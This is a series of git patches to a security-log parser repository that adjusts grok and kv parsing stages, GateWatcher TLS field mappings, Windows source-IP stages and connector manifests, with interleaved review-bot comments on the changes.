From cb3e8051f3659825e515c09a49a008d51cdf033f Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 5 Nov 2024 17:14:08 +0200 Subject: [PATCH 01/84] Add connector info to VadeSecure M365 --- VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml index 8c6e799a6..da4658b6a 100644 --- a/VadeSecure/vade_secure_m365/_meta/manifest.yml +++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml @@ -1,6 +1,8 @@ uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232 name: Vade for M365 slug: vade-m365 +automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616 +automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff description: >- Vade for M365 offers all protections from Vade to our Microsoft 365 Email service data_sources: From e3efa726bbbc5e423677c855d3287a3d8d717001 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 6 Nov 2024 12:26:50 +0200 Subject: [PATCH 02/84] Add `raise_errors` --- RSA/rsa-securid/ingest/parser.yml | 1 + Retarus/retarus_email_security/ingest/parser.yml | 2 ++ .../skyhigh_secure_web_gateway/ingest/parser.yml | 1 + SonicWall/sonicwall-fw/ingest/parser.yml | 2 ++ Sophos/sophos edr/ingest/parser.yml | 5 +++++ Squid/squid/ingest/parser.yml | 1 + Systancia/cleanroom/ingest/parser.yml | 1 + Tehtris/tehtris-edr/ingest/parser.yml | 1 + ThinkstCanary/thinkst-canary/ingest/parser.yml | 1 + Umbrella/umbrella-proxy/ingest/parser.yml | 1 + Veeam/veeam_backup/ingest/parser.yml | 1 + Wallix/wallix-bastion/ingest/parser.yml | 1 + Wallix/wallix-bastion/tests/cron.json | 3 +-- Wallix/wallix-bastion/tests/pam_unix.json | 3 +-- WatchGuard/watchguard-firebox/ingest/parser.yml | 1 + Windows/windows/ingest/parser.yml | 8 ++++++++ WithSecure/withsecure-elements/ingest/parser.yml | 2 ++ 17 files changed, 31 insertions(+), 4 deletions(-) 
diff --git a/RSA/rsa-securid/ingest/parser.yml b/RSA/rsa-securid/ingest/parser.yml index c70fee596..451c6f163 100644 --- a/RSA/rsa-securid/ingest/parser.yml +++ b/RSA/rsa-securid/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: dsv.parse-dsv properties: + raise_errors: false input_field: original.message output_field: message columnnames: diff --git a/Retarus/retarus_email_security/ingest/parser.yml b/Retarus/retarus_email_security/ingest/parser.yml index 6bd68803a..f55fa8ea7 100644 --- a/Retarus/retarus_email_security/ingest/parser.yml +++ b/Retarus/retarus_email_security/ingest/parser.yml @@ -7,6 +7,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.sender output_field: sender pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" @@ -15,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.recipient output_field: recipient pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" diff --git a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml index 9fc2ec259..20b07e5f4 100644 --- a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml +++ b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_kv.message.http_request_first_line}}" output_field: message pattern: "%{WORD:http_method} %{URL:url} HTTP/%{NUMBER:http_version}" diff --git a/SonicWall/sonicwall-fw/ingest/parser.yml b/SonicWall/sonicwall-fw/ingest/parser.yml index 8a913cd4e..03aa0ed21 100644 --- a/SonicWall/sonicwall-fw/ingest/parser.yml +++ b/SonicWall/sonicwall-fw/ingest/parser.yml 
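Review bot: `raise_errors: false` under `properties` of this `dsv.parse-dsv` stage, and on every `grok.match`/`kv.parse-kv` stage the patch touches (Retarus, Skyhigh, SonicWall, Sophos, Squid, Systancia, Tehtris, ThinkstCanary, Umbrella, Veeam, WatchGuard, Windows, WithSecure), turns a non-matching input into a silently absent output field rather than a visible error, and the commit message gives no rationale. For the Windows hash and `IpAddress` stages in particular, a format change at the source would quietly drop whatever enrichment is derived from `result`/`event` (not visible in these hunks) with nothing in the emitted event to show that the stage failed. Consider pairing the change with one test fixture per parser whose input does not match the pattern, so the resulting event shape is pinned, and, if the pipeline offers such a mechanism, a marker that lets unparsed events be monitored. A short comment on the first changed stage of each file, `# tolerate non-matching input; consumers must treat the output field as optional`, would record the intent. The enclosing `pipeline:` list begins above this hunk.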
@@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.susr}}" output_field: result pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})" @@ -47,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: result pattern: "(%{GREEDYDATA}[F|f]ilename: %{FILE:filename}%{GREEDYDATA})" diff --git a/Sophos/sophos edr/ingest/parser.yml b/Sophos/sophos edr/ingest/parser.yml index f7dc22739..c4779fa3f 100644 --- a/Sophos/sophos edr/ingest/parser.yml +++ b/Sophos/sophos edr/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: 'Access was blocked to "%{URL:url}" because of "%{WORD:rulename}".' @@ -19,6 +20,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "Controlled application %{WORD}: %{GREEDYDATA:process_title}" @@ -27,6 +29,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "%{REMOVABLE_STORAGE}|%{STORAGE}" @@ -38,6 +41,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "PUA %{GREEDYDATA:action}: '%{GREEDYDATA:threat}' at '%{GREEDYDATA:file_path}'" @@ -46,6 +50,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "'%{GREEDYDATA:threat}' exploit prevented in %{GREEDYDATA:category}" diff --git a/Squid/squid/ingest/parser.yml b/Squid/squid/ingest/parser.yml index f5b9de6f9..14c43d5d1 100644 --- a/Squid/squid/ingest/parser.yml +++ b/Squid/squid/ingest/parser.yml 
@@ -48,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.url output_field: message pattern: "(%{IP:ip}|%{NOTSPACE:domain}):%{NUMBER:port}" diff --git a/Systancia/cleanroom/ingest/parser.yml b/Systancia/cleanroom/ingest/parser.yml index 0b80ff87c..44342010b 100644 --- a/Systancia/cleanroom/ingest/parser.yml +++ b/Systancia/cleanroom/ingest/parser.yml @@ -16,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{event.result.event_reason}}" output_field: result pattern: "%{SESSION_SUCCESS}|%{SESSION_FAILURE}|%{PROCESS}" diff --git a/Tehtris/tehtris-edr/ingest/parser.yml b/Tehtris/tehtris-edr/ingest/parser.yml index cbcb244bb..aa8f22411 100644 --- a/Tehtris/tehtris-edr/ingest/parser.yml +++ b/Tehtris/tehtris-edr/ingest/parser.yml @@ -23,6 +23,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.description}}" pattern: "(%{APPLICATION_POLICY}|%{URL_DETECTED}|%{MALICIOUS_MACRO})" custom_patterns: diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml index f8cada9ff..8ce315396 100644 --- a/ThinkstCanary/thinkst-canary/ingest/parser.yml +++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml @@ -21,6 +21,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parsed_event.message.DN}}" output_field: result value_sep: "=" diff --git a/Umbrella/umbrella-proxy/ingest/parser.yml b/Umbrella/umbrella-proxy/ingest/parser.yml index 790c57048..442c5da45 100644 --- a/Umbrella/umbrella-proxy/ingest/parser.yml +++ b/Umbrella/umbrella-proxy/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "event.message.http_request_url" output_field: message pattern: "(%{URIPROTO:url_scheme}://)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" 
diff --git a/Veeam/veeam_backup/ingest/parser.yml b/Veeam/veeam_backup/ingest/parser.yml index 5470c716c..7054d0a51 100644 --- a/Veeam/veeam_backup/ingest/parser.yml +++ b/Veeam/veeam_backup/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.UserName}}" output_field: user pattern: '%{GREEDYDATA:domain}\\%{GREEDYDATA:name}' diff --git a/Wallix/wallix-bastion/ingest/parser.yml b/Wallix/wallix-bastion/ingest/parser.yml index ed76d3f43..d9f1be434 100644 --- a/Wallix/wallix-bastion/ingest/parser.yml +++ b/Wallix/wallix-bastion/ingest/parser.yml @@ -2,6 +2,7 @@ name: wallix-bastion ignored_values: ["-"] pipeline: - name: parsed_event + filter: '{{not original.message.startswith("pam_unix(")}}' external: name: kv.parse-kv properties: diff --git a/Wallix/wallix-bastion/tests/cron.json b/Wallix/wallix-bastion/tests/cron.json index da4487e2e..fdb9da3bc 100644 --- a/Wallix/wallix-bastion/tests/cron.json +++ b/Wallix/wallix-bastion/tests/cron.json @@ -15,7 +15,6 @@ }, "user": { "name": "root" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/pam_unix.json b/Wallix/wallix-bastion/tests/pam_unix.json index 5dd28b147..d7ce961b4 100644 --- a/Wallix/wallix-bastion/tests/pam_unix.json +++ b/Wallix/wallix-bastion/tests/pam_unix.json @@ -15,7 +15,6 @@ }, "user": { "name": "wabuser" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/WatchGuard/watchguard-firebox/ingest/parser.yml b/WatchGuard/watchguard-firebox/ingest/parser.yml index 23bdfd0d6..36e32c512 100644 --- a/WatchGuard/watchguard-firebox/ingest/parser.yml +++ b/WatchGuard/watchguard-firebox/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: message pattern: "%{DHCP}|%{USER_LOG}" 
diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 988ae3dbc..5fc6b2eec 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: "=" @@ -46,6 +47,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: ":" @@ -84,6 +86,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.IpAddress}}" output_field: event pattern: "%{GREEDYDATA}%{IPV4:ip}%{GREEDYDATA}" @@ -94,6 +97,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_message_kv.result.Contents}}" output_field: event pattern: >- @@ -105,6 +109,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.url or json.event.RemoteName}}" output_field: event pattern: >- @@ -116,6 +121,7 @@ pipeline: name: grok.match description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format. properties: + raise_errors: false input_field: '{{json.event.ContextInfo.replace(" "," ").replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: "%{CONTEXTINFO_FR}|%{CONTEXTINFO_EN}" @@ -128,6 +134,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: result pattern: >- @@ -139,6 +146,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: >- 
diff --git a/WithSecure/withsecure-elements/ingest/parser.yml b/WithSecure/withsecure-elements/ingest/parser.yml index 83bd21cff..3f8525c4d 100644 --- a/WithSecure/withsecure-elements/ingest/parser.yml +++ b/WithSecure/withsecure-elements/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.details.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" @@ -25,6 +26,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" From ae8806c15f2905ce6b5333b2a4e82d8daa138ec9 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 6 Nov 2024 12:52:13 +0200 Subject: [PATCH 03/84] Fix linting --- Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json 
@@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file From 1722cb45207026aa7f8802b095f9ffb60f25f7b7 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 09:18:29 +0200 Subject: [PATCH 04/84] Fix windows --- Windows/windows/ingest/parser.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 5fc6b2eec..e21ec0b94 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -24,6 +24,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Message}}" output_field: result value_sep: ":" From 5108adaff0f103cfa4a6e28e6c191fc80ae21c4c Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 8 Nov 2024 12:19:44 +0200 Subject: [PATCH 05/84] Fix connector UUID --- VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml index da4658b6a..49acafa59 100644 --- a/VadeSecure/vade_secure_m365/_meta/manifest.yml 
+++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml @@ -1,7 +1,7 @@ uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232 name: Vade for M365 slug: vade-m365 -automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616 +automation_connector_uuid: d3860745-4433-4690-b025-378369ad7201 automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff description: >- Vade for M365 offers all protections from Vade to our Microsoft 365 Email service From b03ca79d59d45dcd12914df6cd8e3532e5912016 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 12 Nov 2024 10:23:11 +0100 Subject: [PATCH 06/84] Fixing parsed_date to match with detection and not analysis --- GateWatcher/aioniq/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 45330587a..ba98a034e 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -10,7 +10,7 @@ pipeline: external: name: date.parse properties: - input_field: "{{json_load.message.timestamp_analyzed}}" + input_field: "{{json_load.message.timestamp_detected}}" output_field: datetime format: null timezone: UTC From 19383dc28b0a3a0e9a42995cf66cd68f11194583 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 12 Nov 2024 11:43:06 +0100 Subject: [PATCH 07/84] Parsing of TLS metadata using ECS tls.server.* fields and two custom fields --- GateWatcher/aioniq/_meta/fields.yml | 12 ++++++++---- GateWatcher/aioniq/ingest/parser.yml | 14 +++++++++++++- 2 files changed, 21 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index d0d85f7f6..7fb7e28af 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml 
@@ -384,10 +384,14 @@ gatewatcher.tlp: name: gatewatcher.tlp type: text -gatewatcher.tls: - description: This field represents the tls field in a network metadata (used in - legacy format log) - name: gatewatcher.tls +gatewatcher.tls.sni: + description: This field represents the TLS SNI field in a TLS metadata + name: gatewatcher.tls.sni + type: text + +gatewatcher.tls.fingerprint: + description: This field represents the TLS server fingerprint field in a TLS metadata + name: gatewatcher.tls.fingerprint type: text gatewatcher.ttp: diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index ba98a034e..b71064e6d 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -29,6 +29,8 @@ pipeline: description: DGA - name: retrohunt description: Retrohunt + - name: tls + description: TLS stages: common: actions: @@ -122,7 +124,6 @@ stages: gatewatcher.sip: "{{json_load.message.sip}}" gatewatcher.smb: "{{json_load.message.smb}}" gatewatcher.ssh: "{{json_load.message.ssh}}" - gatewatcher.tls: "{{json_load.message.tls}}" file.hash.sha256: "{{json_load.message.fileinfo.sha256}}" gatewatcher.dhcp: "{{json_load.message.dhcp}}" gatewatcher.dnp3: "{{json_load.message.dnp3}}" 
@@ -202,3 +203,14 @@ stages: gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}" gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}" gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}" + tls: + actions: + - set: + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls.sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" From dabf885f938ac4fb194fce490569c8689ef40983 Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Tue, 12 Nov 2024 11:52:07 +0100 Subject: [PATCH 08/84] Updated tests --- GateWatcher/aioniq/tests/codebreaker.json | 2 +- GateWatcher/aioniq/tests/dga.json | 2 +- GateWatcher/aioniq/tests/malcore.json | 2 +- GateWatcher/aioniq/tests/retrohunt.json | 2 +- GateWatcher/aioniq/tests/sigflow-alert.json | 2 +- GateWatcher/aioniq/tests/sigflow-file.json | 2 +- GateWatcher/aioniq/tests/sigflow-meta.json | 2 +- 7 files changed, 7 insertions(+), 7 deletions(-) diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json index f16f95623..6d7eb789a 100644 --- a/GateWatcher/aioniq/tests/codebreaker.json +++ b/GateWatcher/aioniq/tests/codebreaker.json @@ -17,7 +17,7 @@ "module": "powershell", "severity": 1 }, - "@timestamp": "2023-03-22T10:32:50.269000Z", + "@timestamp": "2023-03-22T10:30:37.145000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json index b9db082ca..9d702ce4d 100644 --- a/GateWatcher/aioniq/tests/dga.json +++ b/GateWatcher/aioniq/tests/dga.json 
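Review bot: `tls.server.not_before` and `tls.server.not_after` are assigned the raw `notbefore`/`notafter` values, while both are date-typed fields in ECS; unless the source already emits ISO 8601 timestamps (not shown here), they should go through the `date.parse` stage this parser already uses for `@timestamp`, with the ECS fields set from its output. `tls.server.certificate_chain` is an array field in ECS, and `{{json_load.message.tls.chain}}` renders whatever the source holds as one string, so if `chain` is a list the field will receive its text representation rather than one entry per certificate — worth checking against a sample with a multi-certificate chain. The new `tls` pipeline entry in the earlier hunk shows only a description and no filter, so presumably the stage runs on every event and renders empty values when `tls` is absent; if the engine does not drop empty strings, a filter on `json_load.message.tls` would avoid polluting non-TLS events. The enclosing `stages:` mapping opens above this hunk.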
@@ -17,7 +17,7 @@ "module": "dga", "severity": 1 }, - "@timestamp": "2023-03-22T10:46:08.487000Z", + "@timestamp": "2023-03-22T10:25:54.903000Z", "destination": { "address": "pgoadcmgqfacj.com", "domain": "pgoadcmgqfacj.com", diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json index ba95cc211..b5d0a4f69 100644 --- a/GateWatcher/aioniq/tests/malcore.json +++ b/GateWatcher/aioniq/tests/malcore.json @@ -20,7 +20,7 @@ "info" ] }, - "@timestamp": "2023-03-22T10:53:13.408000Z", + "@timestamp": "2023-03-22T10:35:22.615000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json index fd29bcfa4..7c8728304 100644 --- a/GateWatcher/aioniq/tests/retrohunt.json +++ b/GateWatcher/aioniq/tests/retrohunt.json @@ -17,7 +17,7 @@ "module": "retrohunt", "severity": 1 }, - "@timestamp": "2023-06-12T10:12:39.001000Z", + "@timestamp": "2023-06-09T14:08:46.845000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json index 1de9534f5..626ee8eb7 100644 --- a/GateWatcher/aioniq/tests/sigflow-alert.json +++ b/GateWatcher/aioniq/tests/sigflow-alert.json @@ -19,7 +19,7 @@ "module": "alert", "severity": 1 }, - "@timestamp": "2023-03-22T10:44:08.001000Z", + "@timestamp": "2023-03-22T10:25:55.690000Z", "destination": { "address": "2.2.2.2", "bytes": 90364, diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json index 2e1580dce..7e9cc8b6a 100644 --- a/GateWatcher/aioniq/tests/sigflow-file.json +++ b/GateWatcher/aioniq/tests/sigflow-file.json @@ -16,7 +16,7 @@ ], "module": "fileinfo" }, - "@timestamp": "2023-03-22T10:44:07.998000Z", + "@timestamp": "2023-03-22T10:25:55.469000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", 
diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json index 4da5dbc30..6e8cba037 100644 --- a/GateWatcher/aioniq/tests/sigflow-meta.json +++ b/GateWatcher/aioniq/tests/sigflow-meta.json @@ -16,7 +16,7 @@ ], "module": "http" }, - "@timestamp": "2023-03-22T10:44:07.997000Z", + "@timestamp": "2023-03-22T10:25:55.377000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", From 71bb0846a7cd6f72a28493543d4b1066215d3dcd Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Wed, 13 Nov 2024 10:52:05 +0100 Subject: [PATCH 09/84] Fixing tls and tls_* fields --- GateWatcher/aioniq/_meta/fields.yml | 13 +++++++++---- GateWatcher/aioniq/ingest/parser.yml | 5 +++-- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 7fb7e28af..07bae26e7 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml @@ -384,14 +384,19 @@ gatewatcher.tlp: name: gatewatcher.tlp type: text -gatewatcher.tls.sni: +gatewatcher.tls: + description: This field contains all TLS data fields in a TLS metadata + name: gatewatcher.tls + type: text + +gatewatcher.tls_sni: description: This field represents the TLS SNI field in a TLS metadata - name: gatewatcher.tls.sni + name: gatewatcher.tls_sni type: text -gatewatcher.tls.fingerprint: +gatewatcher.tls_fingerprint: description: This field represents the TLS server fingerprint field in a TLS metadata - name: gatewatcher.tls.fingerprint + name: gatewatcher.tls_fingerprint type: text gatewatcher.ttp: diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index b71064e6d..3cc13d747 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml 
@@ -210,7 +210,8 @@ stages: tls.server.not_before: "{{json_load.message.tls.notbefore}}" tls.server.certificate_chain: "{{json_load.message.tls.chain}}" tls.server.subject: "{{json_load.message.tls.subject}}" - gatewatcher.tls.sni: "{{json_load.message.tls.sni}}" - gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" tls.version: "{{json_load.message.tls.version}}" tls.server.not_after: "{{json_load.message.tls.notafter}}" From ec5851efc208a5fa84e247079c402e3bb4b2472d Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 13 Nov 2024 15:45:33 +0100 Subject: [PATCH 10/84] refactor(Windows): merge source_ip and source_address into one stage --- Windows/windows/ingest/parser.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 988ae3dbc..f0bd6640b 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -153,8 +153,7 @@ pipeline: - name: set_file - name: set_user - name: process_ids - - name: source_ip - - name: source_address + - name: set_source_fields - name: action_outcome - name: set_dll filter: "{{ json.event.SourceName == 'Microsoft-Windows-Sysmon' and json.event.EventID == 7}}" @@ -1106,7 +1105,7 @@ stages: action.outcome: "failure" filter: "{{json.event.EventType == 'AUDIT_FAILURE' }}" - source_ip: + set_source_fields: actions: - set: source.ip: "{{json.event.SourceIp or json.event.SourceAddress}}" @@ -1131,8 +1130,6 @@ stages: - set: source.ip: "{{source_ip_ip_address.event.ip}}" - source_address: - actions: - set: source.address: "{{json.event.SourceIp}}" filter: "{{json.event.SourceIp | is_ipaddress}}" From 042e95418f89dd14ed87a57760af748a55ddbd75 Mon Sep 17 00:00:00 2001 
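Review bot: `gatewatcher.tls: "{{json_load.message.tls}}"` renders the whole `tls` mapping into a field declared `type: text`, so the stored value is the template engine's string form of the object (presumably a Python-style repr, not JSON) and duplicates the `tls_sni`/`tls_fingerprint` values set on the next two lines. If the goal is to keep the raw structure searchable, rendering it through a JSON filter (Jinja's `tojson`, if the engine exposes it) would give a stable, parseable value; otherwise consider whether the field is needed at all now that the individual attributes are mapped. The `stages:` mapping and the `tls` action list open above this hunk.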
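Review bot: The `index 988ae3dbc..f0bd6640b` header shows this patch was generated against the Windows parser as it stood before patches 02 and 04 (which took the same file from `988ae3dbc` to `5fc6b2eec` and then `e21ec0b94` with their `raise_errors: false` additions), so the series is not linear and the `source_ip`/`source_address` merge will need reconciling with those hunks on rebase. In the last hunk, removing `source_address:` and its `actions:` line leaves the `- set: source.address:` item to be absorbed into the action list of `set_source_fields`; that only works if its indentation matches the preceding `- set:` items exactly, which the collapsed whitespace here cannot confirm, so a quick parse of the rebased file is worth doing. The `stages:` mapping opens above these hunks.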
From: TOUFIKI Zakarya Date: Wed, 13 Nov 2024 15:56:25 +0100 Subject: [PATCH 11/84] Add saml seervice to the parser --- Google Cloud/google-report/_meta/fields.yml | 15 +++ .../_meta/smart-descriptions.json | 114 ++++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 20 +++ .../tests/test_saml_login_success.json | 63 ++++++++++ .../tests/test_saml_login_success_1.json | 63 ++++++++++ 5 files changed, 275 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_saml_login_success.json create mode 100644 Google Cloud/google-report/tests/test_saml_login_success_1.json diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..ad86f9169 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -42,3 +42,18 @@ google.report.token.type: description: Token type name: google.report.token.type type: keyword + 